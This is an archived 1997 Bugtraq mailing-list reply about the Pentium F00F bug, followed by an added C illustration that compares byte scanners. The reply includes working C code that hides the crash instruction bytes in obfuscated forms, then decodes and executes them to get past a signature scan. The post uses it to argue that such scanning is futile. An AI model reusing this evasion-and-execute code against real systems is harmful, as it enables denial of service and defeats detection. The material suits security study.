Bugtraq mailing list archives
Re: Intel Pentium Bug
From: kragen () DNACO NET (Kragen)
Date: Mon, 10 Nov 1997 07:35:16 -0500
On Sun, 9 Nov 1997, Jason Parsons wrote:
> Re the F0 0F C7 C8 Pentium bug: I just wanted to repost this from the
> Linux-security list.  Thought it might be helpful to some here.  This was
> posted to Linux-security by Sam Trenholme <set () reality samiam org>.
>
>     if($data =~ /\xf0\x0f\xc7\xc8/) {
>         print "$dir/$file contains F0 0F C7 C8\n";
>     }
Is this intended to keep malicious people from crashing your computer?
It is trivial to defeat this, and it is impossible, in the general case,
to determine whether or not a program can compute f0 0f c7 c8 and execute
it.  Here are some trivial examples of ways to defeat it:

/*
 * Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8
 *
 * Each array below holds the four bytes in a disguised form that a byte
 * scanner will not match; the matching helper undoes the disguise at run
 * time and main() then jumps into the buffer.  This relies on the data
 * segment being executable, as it was on systems of the period; with a
 * non-executable data segment the indirect call faults before the
 * instruction runs.  On any CPU other than an affected Pentium, LOCK with
 * a register operand raises an invalid-opcode exception (SIGILL).
 */
#include <string.h>

/* Every byte stored one too high; fix_incr() decrements them back. */
char incr[] = "\xf1\x10\xc8\xc9";

void fix_incr (char *s)
{
    for (; *s; s++)
        --*s;
}

/* Stored back to front; reverse() swaps from both ends toward the middle. */
char backwards[] = "\xc8\xc7\x0f\xf0";

void reverse_inner(char *begin, char *end)
{
    while (end > begin) {
        char t = *end;
        *end = *begin;
        *begin = t;
        end--;
        begin++;
    }
}

void reverse(char *s)
{
    reverse_inner(s, s+strlen(s)-1);
}

/* Every byte XORed with 1 (f0^1=f1, 0f^1=0e, c7^1=c6, c8^1=c9);
 * xor_pad() with the same pad restores f0 0f c7 c8. */
char xored[] = "\xf1\x0e\xc6\xc9";

void xor_pad (char *s, char pad)
{
    for (; *s; s++)
        *s ^= pad;
}

/* Each real byte is preceded by a junk byte; deinterleave() keeps the odd
 * positions, stops at the terminator instead of reading past it, and
 * terminates the compacted result. */
char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8', '\0'};

void deinterleave (char *s)
{
    char *t = s + 1;
    while (*t) {
        *s++ = *t;
        if (t[1] == '\0')
            break;
        t += 2;
    }
    *s = '\0';
}

int main()
{
    void (*f)(void);
    fix_incr(incr);
    reverse(backwards);
    xor_pad(xored, 1);
    deinterleave(interleaved);
    f = (void (*)(void)) incr;  /* or backwards, or xored, or interleaved */
    (*f)();
    return 0;
}

Now, none of these are very subtle.  I could easily write something that
contained a piece of nonsense text, took the second-to-last bit from each
character, and assembled f1 0e c9 c8 from it.  The possibilities are
endless.  A trusted-compiler system seems to be the only possible software
protection against attacks like these.

Kragen
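As an added illustration, not part of Kragen's or Jason's message and not Sam Trenholme's scanner, the C program below places a literal-byte check equivalent to the Perl one-liner next to a slightly broader one and runs both over constructed inputs: the canonical sequence; the same instruction with ECX as its operand (F0 0F C7 C9, which the Perl pattern never matches, since LOCK CMPXCHG8B with a register operand is encoded with any ModRM byte from 0xC8 through 0xCF); an XOR-padded copy as it would sit in a file; that copy after the program has decoded it; and a plain data constant that happens to contain the bytes. The buffers, the 0x55 pad and all function names are this example's own inventions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What the Perl one-liner does: look for the literal bytes F0 0F C7 C8 anywhere. */
int naive_scan(const uint8_t *buf, size_t len)
{
    static const uint8_t sig[4] = { 0xf0, 0x0f, 0xc7, 0xc8 };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, sig, 4) == 0)
            return 1;
    return 0;
}

/* A broader static check: LOCK (F0) + CMPXCHG8B (0F C7 /1) with a register
 * operand, i.e. any ModRM byte 0xC8..0xCF (mod=11, reg=001).  All eight
 * register forms are the same illegal LOCK-with-register case; the Perl
 * pattern matches only the EAX form. */
int f00f_scan(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 4 <= len; i++)
        if (buf[i] == 0xf0 && buf[i + 1] == 0x0f && buf[i + 2] == 0xc7
            && (buf[i + 3] & 0xf8) == 0xc8)
            return 1;
    return 0;
}

/* Stand-in for whatever decoder a program carries: undo a one-byte XOR pad. */
void xor_decode(uint8_t *buf, size_t len, uint8_t pad)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= pad;
}

/* Constructed inputs (this example's own, not from the original post).  Bit N
 * of the return value is set when the corresponding scan reports a hit:
 *   bit 0/1  naive/f00f on the canonical bytes (NOP; LOCK CMPXCHG8B EAX; RET)
 *   bit 2/3  naive/f00f on the ECX form F0 0F C7 C9
 *   bit 4/5  naive/f00f on an XOR-0x55-padded copy, as it sits on disk
 *   bit 6/7  naive/f00f on that copy after the program has decoded it
 *   bit 8    naive on a data constant that merely contains the bytes
 */
int run_cases(void)
{
    static const uint8_t raw[]       = { 0x90, 0xf0, 0x0f, 0xc7, 0xc8, 0xc3 };
    static const uint8_t other_reg[] = { 0x90, 0xf0, 0x0f, 0xc7, 0xc9, 0xc3 };
    static const uint8_t on_disk[]   = { 0xf0 ^ 0x55, 0x0f ^ 0x55,
                                         0xc7 ^ 0x55, 0xc8 ^ 0x55 };
    /* Little-endian bytes of the 32-bit constant 0xC8C70FF0 in a data section. */
    static const uint8_t constant[]  = { 0xf0, 0x0f, 0xc7, 0xc8 };
    uint8_t decoded[sizeof on_disk];
    int hits = 0;

    hits |= naive_scan(raw, sizeof raw)             << 0;
    hits |= f00f_scan(raw, sizeof raw)              << 1;
    hits |= naive_scan(other_reg, sizeof other_reg) << 2;
    hits |= f00f_scan(other_reg, sizeof other_reg)  << 3;
    hits |= naive_scan(on_disk, sizeof on_disk)     << 4;
    hits |= f00f_scan(on_disk, sizeof on_disk)      << 5;

    memcpy(decoded, on_disk, sizeof on_disk);
    xor_decode(decoded, sizeof decoded, 0x55);      /* what the program does before jumping */
    hits |= naive_scan(decoded, sizeof decoded)     << 6;
    hits |= f00f_scan(decoded, sizeof decoded)      << 7;

    hits |= naive_scan(constant, sizeof constant)   << 8;
    return hits;
}

int main(void)
{
    int hits = run_cases();
    printf("canonical bytes:      naive=%d f00f=%d\n", (hits >> 0) & 1, (hits >> 1) & 1);
    printf("ECX operand form:     naive=%d f00f=%d\n", (hits >> 2) & 1, (hits >> 3) & 1);
    printf("XOR-padded, on disk:  naive=%d f00f=%d\n", (hits >> 4) & 1, (hits >> 5) & 1);
    printf("XOR-padded, decoded:  naive=%d f00f=%d\n", (hits >> 6) & 1, (hits >> 7) & 1);
    printf("data constant:        naive=%d\n", (hits >> 8) & 1);
    return 0;
}
```

The two scanners agree on the canonical bytes and on the decoded payload, the broader one also catches the ECX form, neither sees the padded copy until the program itself has decoded it, and both flag the integer constant even though it is never executed. That is the gap Kragen describes: a scan of bytes at rest can neither see what a program will compute nor tell code from data.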